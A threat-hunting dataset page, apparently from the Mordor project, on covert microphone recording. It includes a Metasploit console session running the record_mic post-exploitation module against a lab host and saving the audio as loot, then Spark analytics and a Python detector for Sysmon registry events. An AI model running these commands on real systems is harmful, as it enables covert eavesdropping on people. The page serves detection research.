MSF Record Mic

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/06/09

Modification Date

2020/06/09

Tactics

['TA0009']

Techniques

['T1123']

Tags

['Microphone Access']

Dataset Description

This dataset represents adversaries accessing the microphone of an endpoint.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Threat Hunter Playbook

Name

Processes Accessing the Microphone Device

Link

https://threathunterplaybook.com/notebooks/windows/09_collection/WIN-200609225055.html

Simulation Plan

Environment

Mordor shire

Tool Type

C2

Module

post

Adversary View

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/collection/host/msf_record_mic.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-------------------------+------------------------------------+-------+-----+
|Hostname                 |Channel                             |EventID|count|
+-------------------------+------------------------------------+-------+-----+
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|12     |1635 |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|10     |1464 |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|13     |605  |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational|10     |404  |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|7      |303  |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|7      |277  |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|12     |157  |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational|13     |145  |
|MORDORDC.mordor.local    |Security                            |4703   |119  |
|MORDORDC.mordor.local    |Security                            |5447   |96   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|23     |87   |
|MORDORDC.mordor.local    |Security                            |4658   |74   |
|MORDORDC.mordor.local    |Security                            |5156   |74   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational|11     |63   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|10     |61   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|13     |56   |
|MORDORDC.mordor.local    |Security                            |5158   |41   |
|WORKSTATION6.mordor.local|Security                            |5156   |39   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational|3      |36   |
|WORKSTATION5.mordor.local|Security                            |5156   |30   |
+-------------------------+------------------------------------+-------+-----+
only showing top 20 rows
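Sysmon registry events (IDs 12 and 13) top the counts above, and one host-level detection approach for this dataset keys on the registry location where Windows records per-application microphone use. The block below is an added example (editor's code, not part of this dataset page or of the Mordor/THP notebooks) that applies that filter to Mordor-style JSON lines without Spark; it assumes the Windows CapabilityAccessManager ConsentStore registry location, which the page itself does not state, and runs over constructed sample events.

```python
import json
import re

# Windows tracks per-application microphone use under the CapabilityAccessManager consent store;
# Sysmon Event ID 12 (key created) and 13 (value set) on that key are the host-level signal.
MIC_CONSENT_RE = re.compile(
    r"\\CapabilityAccessManager\\ConsentStore\\microphone\\(NonPackaged\\)?([^\\]+)",
    re.IGNORECASE,
)

def application_from_subkey(nonpackaged, subkey):
    # Classic (non-packaged) apps are keyed by their full path with '\' replaced by '#';
    # packaged apps are keyed by their package family name as-is.
    return subkey.replace("#", "\\") if nonpackaged else subkey

def microphone_access_events(lines):
    """Return one record per Sysmon 12/13 registry event touching the microphone
    consent store, with the application decoded from the key name."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("Channel") != "Microsoft-Windows-Sysmon/Operational" or ev.get("EventID") not in (12, 13):
            continue
        target = ev.get("TargetObject", "")
        m = MIC_CONSENT_RE.search(target)
        if not m:
            continue
        hits.append({"Hostname": ev.get("Hostname"), "Image": ev.get("Image"), "EventID": ev["EventID"],
                     "Application": application_from_subkey(bool(m.group(1)), m.group(2)),
                     # For Event ID 13 the path continues with the value name (LastUsedTimeStart/Stop).
                     "ValueName": target[m.end():].lstrip("\\") or None})
    return hits

def _sample(event_id, target_object):
    # Constructed sample events in the Mordor JSON-lines shape (not records from the dataset).
    return json.dumps({"Hostname": "WORKSTATION6.mordor.local", "EventID": event_id,
                       "Channel": "Microsoft-Windows-Sysmon/Operational",
                       "Image": r"C:\Windows\System32\svchost.exe", "TargetObject": target_object})

_MIC = (r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion"
        r"\CapabilityAccessManager\ConsentStore\microphone")
_APP = r"\NonPackaged\C:#Windows#System32#rundll32.exe"
SAMPLE_LINES = [
    _sample(12, _MIC + _APP),                                  # key created for a classic app
    _sample(13, _MIC + _APP + r"\LastUsedTimeStart"),          # value set: use started
    _sample(13, _MIC + r"\Microsoft.WindowsCamera_8wekyb3d8bbwe\LastUsedTimeStop"),  # packaged app
    _sample(13, _MIC.replace("microphone", "webcam") + _APP + r"\LastUsedTimeStart"),  # not the mic
    _sample(10, ""),                                           # unrelated process-access event
]
```

Calling `microphone_access_events(SAMPLE_LINES)` yields three hits (the webcam and Event ID 10 samples are dropped), each carrying the decoded application path or package name and, for Event ID 13, the value name written.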